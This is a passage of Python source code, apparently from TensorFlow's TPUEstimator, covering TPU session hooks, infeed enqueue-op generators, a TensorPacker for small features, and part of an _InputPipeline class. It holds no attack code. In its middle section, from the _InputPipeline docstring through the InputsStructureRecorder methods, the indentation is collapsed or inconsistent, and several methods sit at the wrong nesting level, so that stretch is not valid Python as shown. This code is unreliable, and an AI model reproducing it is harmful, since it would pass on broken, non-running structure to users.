  not run on the coordinator, and the infeed controller needs only a
  single batch signal.
  """

  def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
               rendezvous=None, master=None, session_config=None):
    super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
        ctx,
        enqueue_ops,
        dequeue_ops,
        tpu_compile_op=tpu_compile_op,
        run_infeed_loop_on_coordinator=False,
        rendezvous=rendezvous,
        master=master,
        session_config=session_config)

  def _create_infeed_controller(self, name, target, args):
    # Later signals are dropped: prediction needs exactly one.
    return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
  """Hook that requests stop at a specified step.
  This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
  following differences for TPU training:
  1. This hook sets the variable for `iterations_per_loop`, which is used by
  `TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
  If the `iterations_per_loop` value is specified as time in seconds, the
  number of iterations per `Session.run` will be estimated automatically
  based on per iteration runtime.
  As the hook execution order is not guaranteed, the variable update is
  handled in `after_create_session` and `after_run` as
  `TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
  2. For each training loop (session.run), the global step could be increased
  multiple times on TPU. The global step tensor value will be explicitly read
  again in `after_run` to ensure the latest value is retrieved to avoid race
  condition.
  """
  def __init__(self,
               iterations_per_loop_counter,
               num_steps=None,
               final_step=None):
    """Initializes a `TPUStopAtStepHook`.
    Args:
      iterations_per_loop_counter: A namedtuple of [`value`, `unit`] that
        represents the number of 'iterations count' or 'time in seconds' to run
        optimizer per loop, based on the `unit` specified, `count` or `seconds`
        respectively.
      num_steps: Number of steps to execute.
      final_step: Step after which to stop.
    Raises:
      ValueError: If one of the arguments is invalid.
    """
    if num_steps is None and final_step is None:
      raise ValueError('One of `num_steps` or `final_step` must be specified.')
    if num_steps is not None and final_step is not None:
      raise ValueError(
          'Only one of `num_steps` or `final_step` can be specified.')
    self._iterations_per_loop_counter = iterations_per_loop_counter
    if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
      raise ValueError(
          'Only `count` or `seconds` are accepted as the '
          '`iterations_per_loop_counter.unit')
    self._num_steps = num_steps
    self._final_step = final_step
    # Start with a single iteration so the runtime estimator (if used) can
    # observe an initial sample before scaling up.
    self._next_iteration_count = 1
    self._iteration_count_estimator = None
    if self._iterations_per_loop_counter.unit == 'seconds':
      self._iteration_count_estimator = (
          iteration_count_estimator.IterationCountEstimator())
    self._start_time = time.time()
  def _next_iterations(self, global_step, final_step):
    """Computes the next iterations count.
    The next iterations count is computed by choosing the smaller of the
    remaining step count (`final_step` - `global_step`) and the estimated
    iterations count returned by the estimator.
    Args:
      global_step: The current step.
      final_step: Step after which to stop.
    Returns:
      The number of iterations count to run per loop.
    """
    remaining_steps = final_step - global_step
    if self._iteration_count_estimator is not None:
      estimated_iterations = self._iteration_count_estimator.get(
          self._iterations_per_loop_counter.value)
    else:
      estimated_iterations = self._iterations_per_loop_counter.value
    # Cap by the remaining steps so training never overshoots `final_step`.
    self._next_iteration_count = min(remaining_steps, estimated_iterations)
    return self._next_iteration_count
  def begin(self):
    """Initializes variables.
    Initializes the global step and iterations per loop variables.
    Raises:
      RuntimeError: An error occurred if global step variable does not exist.
    """
    self._global_step_tensor = training_util.get_global_step()
    if self._global_step_tensor is None:
      raise RuntimeError('Global step should be created.')
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
  def after_create_session(self, session, coord):
    """Computes and updates the first time iterations count.
    The iterations are computed by choosing the smaller of the (`final step` -
    `global step`), and the initial estimated iterations returned by the
    estimator (by default is 1).
    Args:
      session: A TensorFlow Session that has been created.
      coord: A Coordinator object which keeps track of all threads.
    """
    global_step = session.run(self._global_step_tensor)
    if self._final_step is None:
      self._final_step = global_step + self._num_steps
    iterations = self._next_iterations(global_step, self._final_step)
    self._iterations_per_loop_var.load(iterations, session=session)
  def before_run(self, run_context):
    """Reset the timer."""
    # Only needed when iterations are estimated from elapsed seconds.
    if self._iteration_count_estimator is not None:
      self._start_time = time.time()
  def after_run(self, run_context, run_values):
    """Computes the next iterations per loop value or terminates.
    Computes the elapsed time to run the last optimizer loop and if the
    `IterationCountEstimator` is used, records the elapsed time and iterations
    count. If the final step count has been reached, terminates. Otherwise,
    computes and updates the number of iterations to run the optimizer per loop.
    Args:
      run_context: A `SessionRunContext` object.
      run_values: A SessionRunValues object.
    """
    if self._iteration_count_estimator is not None:
      elapsed_time = time.time() - self._start_time
      logging.info("ElapsedTime: %.3f", elapsed_time)
      self._iteration_count_estimator.update(elapsed_time,
                                             self._next_iteration_count)
    # Global step cannot be retrieved via SessionRunArgs and before_run due to
    # race condition.
    global_step = run_context.session.run(self._global_step_tensor)
    if global_step >= self._final_step:
      run_context.request_stop()
    else:
      iterations = self._next_iterations(global_step, self._final_step)
      self._iterations_per_loop_var.load(
          iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
  """Hook that sets the iterations-per-loop variable for evaluation.

  Loads `num_steps` into the iterations-per-loop variable right after
  session creation so the eval loop runs that many iterations per
  `Session.run` call.
  """

  def __init__(self, num_steps):
    """Constructs the hook.

    Args:
      num_steps: Number of steps to execute.
    """
    self._num_steps = num_steps

  def begin(self):
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()

  def after_create_session(self, session, coord):
    iterations_var = self._iterations_per_loop_var
    iterations_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
  """Hook that requests stop according to the stopping signal in prediction."""

  def __init__(self, scalar_stopping_signal):
    self._scalar_stopping_signal = scalar_stopping_signal

  def begin(self):
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()

  def after_create_session(self, session, coord):
    # Not strictly required for prediction (no infeed/outfeed side threads
    # run), but it keeps TPUInfeedOutfeedSessionHook's logging sensible.
    self._iterations_per_loop_var.load(1, session=session)

  def before_run(self, run_context):
    # Fetch the stopping signal alongside the regular run so after_run can
    # inspect it.
    return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)

  def after_run(self, run_context, run_values):
    del run_context  # Unused.
    if not _StopSignals.should_stop(run_values.results):
      return
    # TPUEstimator appends one extra all-stop batch after the user data:
    #
    #   batch 0 .. N-1: user-provided batches, stop = 0
    #   batch N:        batch appended by TPUEstimator, stop = 1
    #
    # That appended batch must not be surfaced to the user. Raising
    # OutOfRangeError here makes MonitoredSession discard the "current"
    # (appended) prediction immediately.
    raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
    ctx, input_fn, inputs_structure_recorder, host_device, host_id):
  """Generates infeed enqueue ops for per-core input_fn on a single host.

  Returns:
    A tuple of (enqueue_ops_fn, captured_infeed_queue).
  """
  captured_infeed_queue = _CapturedObject()
  ordinal_fn = ctx.tpu_ordinal_function(host_id)

  def enqueue_ops_fn():
    """Builds and returns the list of per-core infeed enqueue ops."""
    cores_on_host = ctx.num_of_cores_per_host
    sharded_inputs = []
    for core_idx in range(cores_on_host):
      with ops.name_scope('ordinal_%d' % core_idx):
        user_context = tpu_context.TPUContext(
            internal_ctx=ctx,
            input_device=host_device,
            invocation_index=host_id * ctx.num_of_cores_per_host + core_idx)
        inputs = _Inputs.from_input_fn(input_fn(user_context))
        if inputs.is_dataset:
          raise TypeError(
              '`input_fn` returning `Dataset` is not yet supported in '
              'per-Core input pipeline deployment yet. Please set '
              'TPUConfig.per_host_input_for_training to True or return '
              '`features` and `labels` from `input_fn`')
        features, labels = inputs.features_and_labels()
        inputs_structure_recorder.validate_and_record_structure(
            features, labels)
        sharded_inputs.append(
            inputs_structure_recorder.flatten_features_and_labels(
                features, labels))
    infeed_queue = tpu_feed.InfeedQueue(
        number_of_tuple_elements=len(sharded_inputs[0]))
    captured_infeed_queue.capture(infeed_queue)
    return infeed_queue.generate_enqueue_ops(
        sharded_inputs, tpu_ordinal_function=ordinal_fn)

  return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
    ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
  """Generates infeed enqueue ops for per-host input_fn on a single host.

  Returns:
    A tuple of (enqueue_ops_fn, captured_infeed_queue, dataset_initializer),
    where `dataset_initializer` is None unless `input_fn` returned a
    `Dataset`.
  """
  captured_infeed_queue = _CapturedObject()
  dataset_initializer = None
  with ops.device(device):
    user_context = tpu_context.TPUContext(
        internal_ctx=ctx, input_device=device, invocation_index=host_id)
    inputs = _Inputs.from_input_fn(input_fn(user_context))
    is_dataset = inputs.is_dataset
    if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
      # Prediction requires a dataset so padding and stopping signals can
      # be appended; batch_axis-based sharding is unsupported there.
      if not is_dataset:
        raise TypeError(
            'For mode PREDICT, `input_fn` must return `Dataset` instead of '
            '`features` and `labels`.')
      if batch_axis is not None:
        raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
      inputs = _InputsWithStoppingSignals(
          dataset=inputs.dataset,
          batch_size=ctx.batch_size_for_input_fn,
          add_padding=True)
    if is_dataset:
      dataset_initializer = inputs.dataset_initializer()
    tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
  def enqueue_ops_fn():
    """A Fn returning the TPU infeed enqueue ops.
    By providing as a Fn, it can be invoked inside the tf.while_loop such that
    the input pipeline for multiple iterations can be executed by one
    Session.run call.
    Returns:
      list of dict of ops.
    """
    with ops.device(device):
      num_of_replicas_per_host = ctx.num_of_replicas_per_host
      # Convert user input to features and labels. If the user returns a
      # dataset, it is initialized and the features and labels extracted via
      # `dataset.iterator.get_next()`
      features, labels = inputs.features_and_labels()
      signals = inputs.signals()
      inputs_structure_recorder.validate_and_record_structure(features, labels)
      unsharded_tensor_list = (
          inputs_structure_recorder.flatten_features_and_labels(
              features, labels, signals))
      infeed_queue = tpu_feed.InfeedQueue(
          tuple_types=[t.dtype for t in unsharded_tensor_list],
          tuple_shapes=[t.shape for t in unsharded_tensor_list],
          shard_dimensions=batch_axis)
      captured_infeed_queue.capture(infeed_queue)
      infeed_queue.set_number_of_shards(num_of_replicas_per_host)
      # The host-level batch is split along `batch_axis` into one shard per
      # replica on this host.
      per_host_enqueue_ops = (
          infeed_queue.split_inputs_and_generate_enqueue_ops(
              unsharded_tensor_list,
              placement_function=lambda x: device,
              tpu_ordinal_function=tpu_ordinal_function_impl))
      if signals is None:
        return per_host_enqueue_ops
      else:
        return {
            'ops': per_host_enqueue_ops,
            'signals': signals,
        }
  return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
    ctx, input_fn, inputs_structure_recorder, device, host_id):
  """Generates infeed enqueue ops for per-host input_fn on a single host.

  PER_HOST_V2 requires `input_fn` to return a `Dataset`; the dataset is
  consumed once per replica on this host and each replica receives its own
  shard.

  Returns:
    A tuple of (enqueue_ops_fn, captured_infeed_queue, dataset_initializer).
  """
  captured_infeed_queue = _CapturedObject()
  dataset_initializer = None
  with ops.device(device):
    user_context = tpu_context.TPUContext(
        internal_ctx=ctx, input_device=device, invocation_index=host_id)
    inputs = _Inputs.from_input_fn(input_fn(user_context))
    is_dataset = inputs.is_dataset
    if not is_dataset:
      raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
                      'input pipeline configuration.')
    # Be aware that when num_cores_per_replica > num_cores_per_host,
    # ctx.num_of_replicas_per_host is 0.
    if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
      inputs = _InputsWithStoppingSignals(
          dataset=inputs.dataset,
          batch_size=ctx.batch_size_for_input_fn,
          add_padding=True,
          num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
    dataset_initializer = inputs.dataset_initializer()
  tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
  def device_function_impl(shard_id):
    """Returns the placement device for `shard_id`'s replica, or None."""
    if ctx.device_assignment is not None:
      # Find the replica_id of the host's logical core 0.
      # The current host_id is guaranteed to contain the logical core 0,
      # even when num_cores_per_replica > num_cores_per_host -- the function
      # caller makes sure that this host_id will be receiving data (calls
      # input_fn).
      replica_id = ctx.device_assignment.lookup_replicas(
          task_id=host_id, logical_core=0)[shard_id]
      return ctx.tpu_host_placement_function(replica_id=replica_id)
    else:
      return None
  def enqueue_ops_fn():
    """Generates the per_host enqueue ops."""
    control_deps = []
    per_host_sharded_inputs = []
    enqueue_datas_list = []
    # Be aware that when num_cores_per_replica > num_cores_per_host,
    # ctx.num_of_replicas_per_host is 0.
    num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
    cached_signals = None
    with ops.device(device):
      if not inputs.is_dataset:
        raise TypeError('`input_fn` must return a `Dataset` for this mode.')
      for _ in range(num_replicas_per_host):
        # Use control dependencies to ensure a deterministic ordering.
        with ops.control_dependencies(control_deps):
          features, labels = inputs.features_and_labels()  # Calls get_next()
          signals = inputs.signals()
          # All the replicas share the replica 0's stopping signal.
          # This avoids inconsistent state among different model replicas.
          if cached_signals:
            signals['stopping'] = cached_signals['stopping']
          else:
            cached_signals = signals
          # Split out any TPU-embedding features before recording structure.
          features, labels, enqueue_data = (
              _tpu_estimator_embedding.split_inputs(ctx, features, labels))
          enqueue_datas_list.append(enqueue_data)
          inputs_structure_recorder.validate_and_record_structure(
              features, labels)
          flattened_inputs = (
              inputs_structure_recorder.flatten_features_and_labels(
                  features, labels, signals))
          control_deps.extend(flattened_inputs)
          per_host_sharded_inputs.append(flattened_inputs)
      if inputs_structure_recorder.flattened_input_dims:
        # Spatial partitioning: signals get no partition dims.
        input_partition_dims = inputs_structure_recorder.flattened_input_dims
        if signals:
          input_partition_dims += [None] * len(signals)
        # pylint: disable=protected-access
        infeed_queue = tpu_feed._PartitionedInfeedQueue(
            number_of_tuple_elements=len(per_host_sharded_inputs[0]),
            host_id=host_id,
            input_partition_dims=input_partition_dims,
            device_assignment=ctx.device_assignment)
        per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
            per_host_sharded_inputs)
      else:
        infeed_queue = tpu_feed.InfeedQueue(
            number_of_tuple_elements=len(per_host_sharded_inputs[0]))
        per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
            per_host_sharded_inputs,
            tpu_ordinal_function=tpu_ordinal_function_impl,
            placement_function=device_function_impl)
      captured_infeed_queue.capture(infeed_queue)
      if ctx.embedding_config:
        per_host_enqueue_ops.extend(
            ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
                enqueue_datas_list))
      if signals is None:
        return per_host_enqueue_ops
      else:
        return {
            'ops': per_host_enqueue_ops,
            'signals': signals,
        }
  return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
                                      num_hosts):
  """Generates infeed enqueue ops for one input_fn on all the hosts.

  `input_fn` is invoked once (on host 0). The resulting tensors are either
  broadcast to every replica, or sliced per replica when the SLICED eval
  input configuration is in effect.

  Returns:
    A tuple of (enqueue_ops_fn, captured_infeed_queue, dataset_initializer).
  """
  captured_infeed_queue = _CapturedObject()
  dataset_initializer = None
  device_0 = ctx.tpu_host_placement_function(host_id=0)
  with ops.device(device_0):
    user_context = tpu_context.TPUContext(
        internal_ctx=ctx, input_device=device_0, invocation_index=0)
    inputs = _Inputs.from_input_fn(input_fn(user_context))
    is_dataset = inputs.is_dataset
    if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
      if not is_dataset:
        raise TypeError(
            'For mode PREDICT, `input_fn` must return `Dataset` instead of '
            '`features` and `labels`.')
      inputs = _InputsWithStoppingSignals(
          dataset=inputs.dataset,
          batch_size=ctx.batch_size_for_input_fn,
          add_padding=True)
    if is_dataset:
      dataset_initializer = inputs.dataset_initializer()
    num_replicas_per_host = ctx.num_of_replicas_per_host
  def tpu_ordinal_function_impl(shard_id):
    """Maps a shard id to its TPU core ordinal."""
    if ctx.device_assignment:
      return ctx.device_assignment.tpu_ordinal(replica=shard_id)
    else:
      return shard_id % num_replicas_per_host
  def device_function_impl(shard_id):
    # shard_id ranges from 0 to num_of_replicas_per_host - 1.
    # A shard is a replica inside a host.
    # In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
    # are always executed on the first host. Thus shard_id equals to replica_id.
    return ctx.tpu_host_placement_function(replica_id=shard_id)
  def enqueue_ops_fn():
    """Generates enqueue ops for all the hosts."""
    broadcasted_inputs = []
    flattened_inputs = None  # Cache result from input_fn.
    signals = None
    num_replicas = ctx.num_replicas
    core_id = 0
    for host_id in xrange(num_hosts):
      with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
        for _ in xrange(ctx.num_of_replicas_per_host):
          # Note: input_fn is only called once at host 0 for the first replica.
          # The features and labels returned from that invocation are
          # broadcasted to other replicas(including the replicas on other
          # hosts).
          if flattened_inputs is None:
            features, labels = inputs.features_and_labels()  # Calls get_next()
            signals = inputs.signals()
            inputs_structure_recorder.validate_and_record_structure(
                features, labels)
            flattened_inputs = (
                inputs_structure_recorder.flatten_features_and_labels(
                    features, labels, signals))
            # NOTE: `input_slices` is only assigned on this first pass; the
            # identical SLICED check below guarantees it is defined whenever
            # it is read.
            if (ctx.config.tpu_config.eval_training_input_configuration is
                tpu_config.InputPipelineConfig.SLICED):
              input_slices = [
                  array_ops.split(x, num_replicas) for x in flattened_inputs
              ]
          if (ctx.config.tpu_config.eval_training_input_configuration is
              tpu_config.InputPipelineConfig.SLICED):
            # for each core, slice out the flattened_inputs for each core.
            broadcasted_inputs.append([x[core_id] for x in input_slices])
            core_id += 1
          else:
            broadcasted_inputs.append(flattened_inputs)
    infeed_queue = tpu_feed.InfeedQueue(
        number_of_tuple_elements=len(broadcasted_inputs[0]))
    captured_infeed_queue.capture(infeed_queue)
    enqueue_ops = infeed_queue.generate_enqueue_ops(
        broadcasted_inputs,
        tpu_ordinal_function=tpu_ordinal_function_impl,
        placement_function=device_function_impl)
    if signals is None:
      return enqueue_ops
    else:
      return {
          'ops': enqueue_ops,
          'signals': signals,
      }
  return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
  """Pack and unpack small tensors into a big one for efficiency.

  Input pipelines often carry many tiny rank-2 dense features. Infeeding
  each one separately is expensive, so when enough small features of the
  same dtype are present they are concatenated into one tensor before
  infeed (`maybe_concatenate_features`) and split back apart afterwards
  (`maybe_split_features`).
  """

  def __init__(self, small_feature_dim_size,
               minimum_num_small_features_to_group):
    """Constructs a TensorPacker.

    Args:
      small_feature_dim_size: Maximum second-dimension size for a rank-2
        tensor to be considered a "small" feature.
      minimum_num_small_features_to_group: Minimum number of small features
        of the same dtype required before they are grouped.
    """
    self._small_feature_dim_size = small_feature_dim_size
    self._minimum_num_small_features_to_group = (
        minimum_num_small_features_to_group)

  def maybe_concatenate_features(self, features):
    """If there are enough small tensors, concat them for performance.

    Mutates `features` in place: qualifying small features are removed and
    replaced by one concatenated tensor per dtype under a reserved key.
    Does nothing when `features` is a single tensor or contains any
    non-Tensor (nested) value.

    Args:
      features: Dict mapping feature name to `Tensor` (or a single tensor).

    Raises:
      ValueError: If a reserved concatenation key is already present in
        `features`.
    """
    self._small_feature_names = {}
    self._small_feature_sizes = {}
    feature_names = _extract_key_names(features)
    if feature_names:  # Not a single tensor.
      # First pass: see if it is worth concatenating the small features.
      for name in feature_names:
        tensor = features[name]
        # We do not handle nested inputs here.
        if not isinstance(tensor, ops.Tensor):
          return
        shape = tensor.get_shape().as_list()
        dtype = tensor.dtype
        if (len(shape) == 2 and
            shape[1] <= self._small_feature_dim_size):
          logging.info('Found small feature: %s %s', name, shape)
          if dtype not in self._small_feature_names:
            self._small_feature_names[dtype] = []
            self._small_feature_sizes[dtype] = []
          self._small_feature_names[dtype].append(name)
          self._small_feature_sizes[dtype].append(shape[1])
      dtypes_ = list(self._small_feature_names.keys())
      for dtype in dtypes_:
        # Only group a dtype when enough small dense features were found;
        # otherwise forget about it entirely.
        if (len(self._small_feature_names[dtype]) <
            self._minimum_num_small_features_to_group):
          self._small_feature_names.pop(dtype)  # reset
          self._small_feature_sizes.pop(dtype)  # reset
      # Second pass: separate small features out
      small_feature_tensors = {}
      for dtype in self._small_feature_names:
        small_feature_tensors[dtype] = []
        for name in self._small_feature_names[dtype]:
          small_feature_tensors[dtype].append(features.pop(name))
      # Add the concat Tensor to features with a special key.
      for dtype in self._small_feature_names:
        key = self._get_small_feature_key(dtype)
        if key in features:
          # Bug fix: the original message left the '{}' placeholder unfilled
          # and was missing a space between the concatenated string parts.
          raise ValueError('{} is reserved as feature key for concatenated '
                           'small features.'.format(key))
        features[key] = array_ops.concat(small_feature_tensors[dtype], axis=1)

  def maybe_split_features(self, maybe_concatenated_features):
    """Splits previously concatenated features back into the originals.

    Args:
      maybe_concatenated_features: Dict of features, possibly containing
        reserved keys produced by `maybe_concatenate_features`. Mutated in
        place.
    """
    for dtype in self._small_feature_names:
      key = self._get_small_feature_key(dtype)
      concatenated_small_features = maybe_concatenated_features.pop(key)
      splits = array_ops.split(
          concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
      for name, split in zip(self._small_feature_names[dtype], splits):
        maybe_concatenated_features[name] = split

  def _get_small_feature_key(self, dtype):
    # Reserved key: shared prefix plus the dtype's string form.
    return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
  TPUEstimator allows various different structures for inputs (namely `features`
  and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
  These are flattened before they are passed to the infeed/outfeed library
  as that expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
    @property
    def flattened_input_dims(self):
      """Partition dims aligned with the flattened input tensors.

      Only available after the first validate_and_record_structure() call.
      """
      assert self._initialized, 'InputsStructureRecorder is not initialized.'
      return self._flattened_input_dims
    def has_labels(self):
      """Returns True if labels were recorded by flatten_features_and_labels."""
      return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
  """Initializes the input pipeline.

  Args:
    input_fn: input fn for train or eval.
    batch_axis: A python tuple of int values describing how each tensor
      produced by the Estimator `input_fn` should be split across the TPU
      compute shards.
    ctx: A `_InternalTPUContext` instance with mode.

  Raises:
    ValueError: If both `sharded_features` and `num_cores` are `None`.
  """
  self._input_fn = input_fn
  self._batch_axis = batch_axis
  self._ctx = ctx
  self._sharded_per_core = ctx.is_input_sharded_per_core()
  # Populated later, once the enqueue graph has been built.
  self._infeed_queue = None
  self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
      ctx.input_partition_dims)
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
  """Builds the infeed enqueue ops and a matching dequeue_fn.

  Building the enqueue graph records the input structure as a side effect
  (the body function invoking `enqueue_fn` is traced while constructing the
  tf.while_loop), so `dequeue_fn` can later restore the flattened tensors
  to their original (features, labels) form.

  Returns:
    A tuple (enqueue_ops, dequeue_fn, hooks, run_infeed_loop_on_coordinator).
  """
  structure_result = self._invoke_input_fn_and_record_structure()
  enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = structure_result
  self._validate_input_pipeline()

  def dequeue_fn():
    """Used by TPU to retrieve the tensors for one step."""
    # In the model-parallel case, host-side and device-side computations
    # must agree on the infeed core; logical core 0 of each replica is used.
    dequeued_values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
    # The unflatten process uses the structure information recorded above.
    return self._inputs_structure_recorder.unflatten_features_and_labels(
        dequeued_values)

  return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
  """Deploys the input pipeline and records the input structure."""
  enqueue_ops = []
  infeed_queues = []
  all_dataset_initializers = []
  num_hosts = self._ctx.num_hosts
  tpu_host_placement_fn = self._ctx.tpu_host_placement_function
  # Whether the coordinator (rather than a tf.while_loop wrapped graph)
  # should drive the infeed enqueue loop.  Flipped to False below whenever
  # the enqueue ops get wrapped in a while loop.
  run_infeed_loop_on_coordinator = True

  if self._sharded_per_core:
    # Per-Core input pipeline deployment.
    # Invoke input pipeline for each core and placed on the corresponding
    # host.
    for host_id in range(num_hosts):
      host_device = tpu_host_placement_fn(host_id=host_id)
      with ops.device(host_device):
        with ops.name_scope('input_pipeline_task%d' % (host_id)):
          enqueue_ops_fn, captured_infeed_queue = (
              generate_per_core_enqueue_ops_fn_for_host(
                  self._ctx, self._input_fn, self._inputs_structure_recorder,
                  host_device, host_id))

          if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
            run_infeed_loop_on_coordinator = False
            enqueue_ops.append(
                _wrap_computation_in_while_loop(
                    device=host_device, op_fn=enqueue_ops_fn))
          else:
            enqueue_ops.append(enqueue_ops_fn())
          # Infeed_queue_getter must be called after enqueue_ops_fn is called.
          infeed_queues.append(captured_infeed_queue.get())
  elif self._ctx.is_input_broadcast_with_iterators():
    # Only calls input_fn in host 0.
    host_device = tpu_host_placement_fn(host_id=0)
    enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
        generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
                                          self._inputs_structure_recorder,
                                          num_hosts))
    if dataset_initializer:
      # input_fn returned a Dataset: initialize it outside the loop and
      # wrap the enqueue ops in a while loop (see the NOTE below for why).
      all_dataset_initializers.append(dataset_initializer)
      run_infeed_loop_on_coordinator = False
      wrap_fn = (
          _wrap_computation_in_while_loop
          if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
          _wrap_computation_in_while_loop_with_stopping_signals)
      enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
    else:
      enqueue_ops.append(enqueue_ops_fn())
    infeed_queues.append(captured_infeed_queue.get())
  else:
    # This branch handles two scenarios:
    #   num_cores_per_replica > num_cores_per_host
